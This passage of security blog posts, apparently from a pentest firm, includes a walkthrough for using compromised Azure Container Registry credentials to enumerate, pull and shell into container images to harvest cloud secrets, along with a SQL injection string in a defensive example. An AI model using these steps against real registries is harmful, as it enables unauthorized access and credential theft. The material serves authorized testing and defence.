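    """Salt and hash a password for storage (PBKDF2-HMAC-SHA256)."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)
    return salt, digest

def verify_password(password, salt, stored_digest):
    """Recompute the salted hash and compare in constant time."""
    _, digest = hash_password(password, salt)
    return hmac.compare_digest(digest, stored_digest)

# On registration: store only the salt and digest, never the password.
salt, stored = hash_password("correct horse battery staple")

# On login: the server salts and hashes what the client sent and compares.
assert verify_password("correct horse battery staple", salt, stored)
assert not verify_password("hunter2", salt, stored)
```

Because the stored digest is never sent over the wire and can’t be replayed in place of the password, capturing traffic no longer yields a usable credential.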


BetaFast

  • Input validation and parameterized queries – Unlike Beta Bank, it’s not an issue that traffic can be intercepted and modified. The issue is that vulnerabilities exist in the way the application server processes input. Anything sent from the client should be validated by the server, and SQL statements should use parameterized queries.
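As a sketch of the difference, using Python’s built-in sqlite3 driver (the schema and data here are hypothetical, and any parameterized database API behaves the same way):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE Users (Username TEXT, Balance REAL)")
conn.executemany("INSERT INTO Users VALUES (?, ?)",
                 [("blogger", 3.50), ("The_Chairman", 1_000_000.00)])

payload = "blogger' OR '1'='1"  # classic injection attempt

# Vulnerable: string concatenation lets the payload rewrite the query logic.
vulnerable = conn.execute(
    "SELECT * FROM Users WHERE Username = '" + payload + "'"
).fetchall()

# Safe: the driver binds the payload as a literal value, never as SQL.
safe = conn.execute(
    "SELECT * FROM Users WHERE Username = ?", (payload,)
).fetchall()

assert len(vulnerable) == 2  # injection dumped every user
assert len(safe) == 0        # nobody is literally named the payload string
```

With parameter binding, the injected quote and OR clause are just characters in a username, not SQL.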

As always, be sure to check out our GitHub for copies of BetaFast and Beta Bank. And be sure to tune in for further guides on hacking thick client applications!


Credit Union Journal: Credit unions must step up cybersecurity during coronavirus

On May 13, 2020, NetSPI Managing Director Nabil Hannan was featured in Credit Union Journal.

As COVID-19 stay-at-home orders begin to lift, people who have the capability to do business from home are being encouraged to do so – and credit unions are no exception.

Throughout the pandemic, organizations have had to put business disaster recovery (BDR) and business continuity plans (BCP) to the test – and in tandem, we’ve seen an increased emphasis on cybersecurity resiliency.

Cybersecurity concerns have risen over the past couple of months as attackers continue to take advantage of the situation. Notably, the Zeus Sphinx banking trojan has returned, phishing attacks are up 350%, and the growing remote workforce has increased the use of potentially vulnerable technologies.

Read the full article here.


Attacking Azure Container Registries with Compromised Credentials

Azure Container Registries are Microsoft’s solution for managing Docker images in the cloud. The service allows for authentication with AzureAD credentials, or an “Admin user” that shares its name with the registry.


For the purposes of this blog, let’s assume that you’ve compromised some Admin user credentials for an Azure Container Registry (ACR). These credentials may have been accidentally uploaded to GitHub, found on a Jenkins server, or discovered in any number of random places that you may be able to find credentials.

Alternatively, you may have used the recently updated version of Get-AzPasswords, to dump out ACR admin credentials from an Azure subscription. If you already have rights to do that, you may just want to skip to the end of this post to see the AZ CLI commands that you can use instead.


The credentials will most likely be in a username/password format, with a registry URL attached (

Now that you have these credentials, we’ll go through next steps that you can take to access the registry and (hopefully) escalate your privileges in the Azure subscription.

Logging In

The login portion of this process is really simple. Enter the username, registry URL, and the password into the following docker command:

docker login -u USER_NAME -p PASSWORD REGISTRY_URL

If the credentials are valid, you should get a “Login Succeeded”.

Enumerating Container Images and Tags

In order to access the container images, we will need to enumerate the image names and available tags. Normally, I would do this through an authenticated AZ CLI session (see below), but since we only have the ACR credentials, we will have to use the Docker Registry APIs to do this.

For starters, we will use the “_catalog” API to list out all of the images for the registry. This needs to be done with authentication, so we will use the ACR credentials in a Basic Authorization (Base64[USER:PASS]) header to request “https://REGISTRY_URL/v2/_catalog”.

Sample PowerShell code:


Now that we have a list of images, we will want to find the current tags for each image. This can be done by making additional API requests to “https://REGISTRY_URL/v2/IMAGE_NAME/tags/list” (where IMAGE_NAME is the image you want the tags for).

Sample PowerShell code:
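Both requests can also be sketched with Python’s standard library. The registry name and credentials below are placeholders; the /v2/_catalog and /v2/IMAGE_NAME/tags/list paths are the standard Docker Registry HTTP API v2 endpoints:

```python
import base64
import json
import urllib.request

def basic_auth(user, password):
    """Build the Basic Authorization header: Base64(USER:PASS)."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return {"Authorization": f"Basic {token}"}

def registry_get(registry, path, user, password):
    """GET a Docker Registry v2 API path and parse the JSON response."""
    req = urllib.request.Request(f"https://{registry}{path}",
                                 headers=basic_auth(user, password))
    with urllib.request.urlopen(req) as resp:
        return json.load(resp)

# Placeholder registry and credentials -- substitute the compromised values.
# registry, user, password = "EXAMPLEACR.azurecr.io", "EXAMPLEACR", "PASSWORD"
# for image in registry_get(registry, "/v2/_catalog", user, password)["repositories"]:
#     tags = registry_get(registry, f"/v2/{image}/tags/list", user, password)["tags"]
#     print(image, tags)
```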


To make this whole process easier, I’ve wrapped the above code into a PowerShell function (Get-AzACR) in MicroBurst to help.

PS C:> Get-AzACR -username EXAMPLEACR -password A_$uper_g00D_P@ssW0rd -registry
docker pull
docker pull
docker pull
docker pull
docker pull
docker pull

As you can see above, this script will output the docker commands that can be run to “pull” each image (with the first available tag).

Important note: the first tag returned by the APIs may not be the latest tag for the image. The API is not great about returning metadata for the tags, so it’s a bit of a guessing game for which tag is the most current. If you want to see all tags for all images, just use the -all flag on the script.
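Generating that pull script is just string formatting over the catalog results; a minimal sketch with hypothetical image names:

```python
def pull_commands(registry, image_tags, all_tags=False):
    """Emit 'docker pull' lines: first tag per image unless all_tags is set."""
    return [
        f"docker pull {registry}/{image}:{tag}"
        for image, tags in image_tags.items()
        for tag in (tags if all_tags else tags[:1])
    ]

# Hypothetical catalog results from the registry APIs above.
catalog = {"dockercore": ["1234", "latest"], "billing-api": ["v2"]}
script = pull_commands("exampleacr.azurecr.io", catalog)
assert script[0] == "docker pull exampleacr.azurecr.io/dockercore:1234"
assert len(pull_commands("exampleacr.azurecr.io", catalog, all_tags=True)) == 3
```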

Append the output of the script to a .ps1 file and run it to pull all of the container images to your testing system (watch your disk space). Alternatively, you can just pick and choose the images that you want to look at one at a time:

PS C:> docker pull
1234: Pulling from dockercore
6638d86fd3ee: Download complete
6638d86fd3ee: Pull complete
Digest: sha256:2c[Truncated]73
Status: Downloaded image for

Fun fact – This script should also work with regular docker registries. I haven’t had a non-Azure registry to try this against yet, but I wouldn’t be surprised if this worked against a standard Docker registry server.

Running Docker Containers

Once we have the container images on our testing system, we will want to run them.

Here’s an example command for running a container from the dockercore image with an interactive entrypoint of “/bin/bash”:

docker run -it --entrypoint /bin/bash

*This example assumes bash is an available binary in the container; bash may not always be available for you.

With access to the container, we can start looking at any local files, and potentially find secrets in the container.

Real World Example

For those wondering how this could be practical in the real world, here’s an example from a recent Azure cloud pen test.

  1. Azure Storage Account exposed a Terraform script containing ACR credentials
  2. NetSPI connected to the ACR with Docker
  3. Listed out the images and tags with the above process
  4. NetSPI used Docker to pull images from the registry
  5. Ran bash shells on each image and reviewed available files
  6. Identified Azure storage keys, Key Vault keys, and Service Principal credentials for the subscription

TL;DR – Anonymous access to ACR credentials resulted in Service Principal credentials for the subscription

Using the AZ CLI

If you already happen to have access to an Azure subscription where you have ACR reader (or subscription reader) rights on a container registry, the AZ CLI is your best bet for enumerating images and tags.

From an authenticated AZ CLI session, you can list the registries in the subscription:

PS C:> az acr list
"adminUserEnabled": true,
"creationDate": "2019-09-17T20:42:28.689397+00:00",
"id": "/subscriptions/d4[Truncated]b2/resourceGroups/ACRtest/providers/Microsoft.ContainerRegistry/registries/netspiACR",
"location": "centralus",
"loginServer": "",
"name": "netspiACR",
"type": "Microsoft.ContainerRegistry/registries"

Select the registry that you want to attack (netspiACR) and use the following command to list out the images:

PS C:> az acr repository list --name netspiACR

List tags for a container image (ACRtestImage):

PS C:> az acr repository show-tags --name netspiACR --repository ACRtestImage

Authenticate with Docker

PS C:> az acr login --name netspiACR
Login Succeeded

Once you are authenticated and have the container image name and tag, the “docker pull” process will be the same as above.


Azure Container Registries are a great way to manage Docker images for your Azure infrastructure, but be careful with the credentials. Additionally, if you are using a premium SKU for your registry, restrict the access for the ACR to specific networks. This will help reduce the availability of the ACR in the event of the credentials being compromised. Finally, watch out for Reader rights on Azure Container Registries. Readers have rights to list and pull any images in a registry, so they may have more access than you expected.


Penetration Testing Paradox: Criteria for Evaluating Pentest Providers

Back in the mid-1960s, computer experts warned of the inevitability of bad actors trying to access information across computer lines. In fact, InfoSec Institute cites that “at the 1967 annual Joint Computer Conference…more than 15,000 computer security experts, government and business analysts discussed concerns that computer communication lines could be penetrated, coining the term [penetration testing or white hat testing] and identifying what has become perhaps the major challenge in computer communications today.”

Fast forward to 2020 and businesses will find that the pentesting industry is made up of a lot of providers offering vulnerability management services. But does that mean all penetration testing services offer the same results? Simply stated, the answer is no. To help organizations choose the right team for their pentesting and vulnerability management (VM) programs, consider the following four paradoxical attributes that should help CISOs and CIOs select a top penetration testing partner.

Pentesting Should be Agile, Yet Consistent Over Time

It’s important to hire a talented penetration testing team – one that’s able to look at the environment through the eyes of an attacker and bring their insights of technical risk to the table as the environment and technology become more complex over time. The pentesting team needs to be agile to continuously improve and evolve to meet the ever-changing and elevated risk and complexities that your business may face.

While evaluating agility, it’s important to also look at consistency. Does your potential pentesting partner have a team orientation versus just an individual, or outsourced consultant, who owns the knowledge? What if that individual moves on to “greener pastures?” It’s my recommendation that you shouldn’t consider a white hat tester who acts alone. Rather, choose a pentesting team built around a consistent delivery of quality, service, and results, that can be an extension of your internal team and will bring you the foundational support you need in your vulnerability management program.

The Pentesting Process Should be Custom Yet Standard

With 640 terabytes of data traveling around the globe every minute, is it possible to put standards around your vulnerability management program? In my opinion, it’s not only possible, it’s a necessity.

Who you get doesn’t have to be what you get, as people so often think. From project management workflows and practitioner guides to standardized pentest checklists and testing playbooks, at NetSPI we have formalized quality assurance and oversight so we can deliver consistent results, no matter who your assigned NetSPI security consultant is. With these standardized processes in place, when new vulnerabilities are identified, we are able to quickly mobilize and study the attack scenario, and if appropriate, we add that specific vulnerability to our pentest checklists for future assessments.

Having said that, every situation has its nuances. While understanding that no organization is the same, there may be some commonalities between industries, like similar regulatory bodies to comply with, for example. This allows pentesters to put some standardization into their process while allowing for customization and flexibility that is unique to the client environment from a business or technical perspective.

Technology/IT Should be Automated to Increase Manual Pentesting

Automated scanning is foundational to any penetration testing program. It’s how an organization handles the thousands of results from those scans that is crucial as there will be duplicates, false positives, and many, many data points, oftentimes delivered in spreadsheets or PDFs. Your internal security/IT team is then tasked with sifting through, sorting, and evaluating that data. Is that administrative work the best use of their time?

In my opinion, your internal team should focus on finding solutions for effective and fast vulnerability remediation, rather than spending their time heads down in administrative tasks. It’s up to your pentesting team to identify and communicate the priority vulnerabilities, not hand you a document and wish you luck. Look for a penetration testing provider who has tools in place to automate pentest reporting functions and deliver results that can be easily sorted and acted upon so that the majority of human capital investment is focused on finding and fixing vulnerabilities. A favorite quote of mine from NetSPI product manager Jake Reynolds exemplifies the mindset of those individuals working to solve the technical complexities of vulnerability management (VM), “I want to hack and secure the largest companies in the world…I participate in solving real world problems that affect companies and people across the globe.”

A Focus on Internal R&D Will Strengthen the Entire Security Community

Being able to collaborate with a team is critical in our client relationships. We instill that collaborative mindset through an intense and immersive training program, NetSPI University, for entry-level security testing talent. Why dedicate so much time to continued education and mentorship? At NetSPI, we are consistently asked to see around corners and penetration test more and more complex environments. So, training and collaboration are key to helping us grow and scale pentesting talent to meet our industry’s evolving needs.

Training and collaboration can’t, and isn’t, just a NetSPI initiative. Collaboration and innovation are key to evolving as an enterprise and as an industry. As I wrote in this blog post, pentesters are intensely creative and have highly curious technical minds, and our team strongly believes that the effort we place in research and development with our colleagues should be shared with the broader security community. Case in point? The NetSPI blog is a treasure trove of information for the pentesting community at large, along with the content on our open source portal.

Final words on this subject: Penetration testing services are the same by definition, but none are created equal. When hiring a penetration testing service provider to test your applications, cloud, network, or perform a red teaming exercise, think beyond whether they can simply identify vulnerabilities. Consider pentesting talent, processes, technology, and culture to ensure you’re getting the most value out of your partnership.


Overcoming Challenges of COVID-19 with Telemedicine and New Technology Solutions

In a recent episode of Agent of Influence, I talked with Anubhav Kaul, Chief Medical Officer at Mattapan Community Health Center near Boston about not only some of the medical challenges they are facing during COVID-19, but also some of the software and security challenges. I wanted to share some of his insights in a blog post, but you can also listen to our interview here, on Spotify, Apple Music, or wherever you listen to podcasts.

COVID-19 Impacts on Telemedicine

Telemedicine has been available and used for multiple years and takes many different forms. For example, your doctor calling you on the phone and updating you on your results is telemedicine, receiving results through an electronic portal is telemedicine, or receiving feedback from your provider over a text message platform is telemedicine.

However, COVID-19 has drastically changed many doctors’ reliance on telemedicine to be the primary platform for how they provide care to their patients. According to Kaul, 90 percent of care being delivered by Mattapan is currently being delivered via telemedicine, including treatment of chronic conditions and urgent concerns. This has been made possible largely because the payers, both public and private, recognized the essential need of working in the current climate and have been able to help Mattapan receive reimbursement for providing telemedicine-based care.

The challenges Mattapan is currently experiencing are mostly around adoption of video and phone technology enabling remote treatment, since many clinicians have never had training on how to conduct effective telemedicine appointments.

In addition, while there is a tremendous amount of care that can be provided to patients without physically seeing them, the ability to be in the presence of patients and evaluate them in person is sometimes irreplaceable. In part to combat this challenge, Mattapan is leveraging medical devices that help patients manage certain conditions from home, many of which automatically send data directly to doctors as it’s collected, including devices to measure blood pressure, glucose, weight, and more.

Kaul has also noticed that doctor-patient relationships, like so many relationships, are struggling with the lack of social connection, one of the most gratifying parts of providing care in person. With new technological developments, people in general are more distracted by their technology and less attentive to the person right in front of them, including doctors when seeing patients. This may be exacerbated as doctors leverage telemedicine to provide treatment and try to connect with patients over video and phone.

Staying Secure While Providing Remote Treatment

Providers have always had to focus on ensuring their communications with patients are secure and HIPAA compliant. Many clinicians want to provide the best care to their patients, which may sometimes mean giving out their cell phone numbers to patients or texting their patients to allow for accessibility of care. While they have every intention of doing the right thing for the patient, these are not necessarily considered safe modes of communicating with patients. They may be easy and accessible, but there is a level of risk when it comes to using unofficial platforms.

Encrypted email and online patient portals are more secure options for messaging, even if they may not be as convenient for clinicians and patients.

Even outside of a pandemic, doctors and clinics will always face a security challenge in which two goals sometimes stand in conflict: protecting the patient’s information, and protecting the patient’s health by providing accessible care, all without putting themselves or their clinic at risk by using unsecure modes of communication.

Mattapan uses Epic, an Electronic Medical Record (EMR) system that is integrated with Zoom technology to provide telemedicine via video and which allows patients to send pictures that are then uploaded into their patient portal and medical record. However, most visits will continue to be phone-based, primarily because of accessibility. While getting people to adopt new technology is always a challenge, Mattapan is working to increase video adoption to give all their patients the full functionality that that medium provides.

As Mattapan and clinics around the world leverage new technology and medical devices to treat patients remotely, they don’t necessarily know the security threats these technology solutions pose because they’ve never used them before, especially to this extent. While hospital IT and security teams are working to quickly test and set up these systems, there are risks associated.

As a clinician, Kaul is not necessarily constantly thinking about security risks, but more about the most accessible way to provide care to Mattapan’s patients. He sees this time as presenting an opportunity in the market for telemedicine software solutions and medical devices, so that doctors can continue to treat patients remotely – and even offer broader and improved treatments.

I’ve completed a fair number of security assessments for electronic medical devices and organizations that build hardware leveraged by doctors, and in my experience, doctors hate security because it interferes with their ability to conduct the job at hand. And in certain cases, the job at hand takes significantly higher priority than the potential security risks. For example, I don’t think any doctor wants to have to enter a password before they can use a surgical device, because sometimes every second matters when it comes to the life of a patient.

Increasing Challenges of Patient Authentication

Another challenge when it comes to treating patients remotely is patient authentication. For example, you may be trying to monitor a patient’s blood pressure and send them home with a device that continually sends data back, but how do you know that data comes from your patient and not their child, sibling, or someone else? Kaul acknowledges that there’s no easy way to authenticate this, and it’s very easy for patients to cheat the system if they want to. These are challenges that need more focus and attention, which they’re probably not getting right now because usability takes a much higher priority than security.

Mattapan is focused on making sure any patient interactions they’re having are as reliable as possible, especially during this time. However, there are unique challenges. For example, sometimes they rely on talking with family members of patients who can’t speak English, but that family member may not have full authority over the patient’s health care information and decisions. These types of scenarios are gaps that software and medical device companies could fill, but they may not be given the highest priority at this time.

Prescribing Prescriptions Virtually

Doctors have long been able to electronically prescribe most medications, but during the COVID-19 pandemic, they are also allowed to prescribe other medications that previously required a paper prescription, including controlled substance pain medications, certain psychiatric medications, and medications meant to treat addictions.

Being able to prescribe controlled substances electronically has made the process more accessible, especially in these current times, but it has also added security challenges. These challenges include making sure that the patient is properly identified, and they are receiving the prescriptions in a secure manner from the pharmacy. This level of accessibility is great for the patient and for the provider, but certain guidelines have been adopted to make sure this is done in a standardized fashion and to make sure that doctors are still connecting with these patients over the phone or video to see how their care is going, whether it’s for pain management or treating them for addiction-based disorders.

During these uncertain times, doctors and hospitals are working to increase accessibility of care, but with accessibility comes the responsibility of making sure that parameters of appropriately treating patients are in place – along with the appropriate security measures.

To listen to the full podcast, click here, or you can find Agent of Influence on Spotify, Apple Music, or wherever you listen to podcasts.
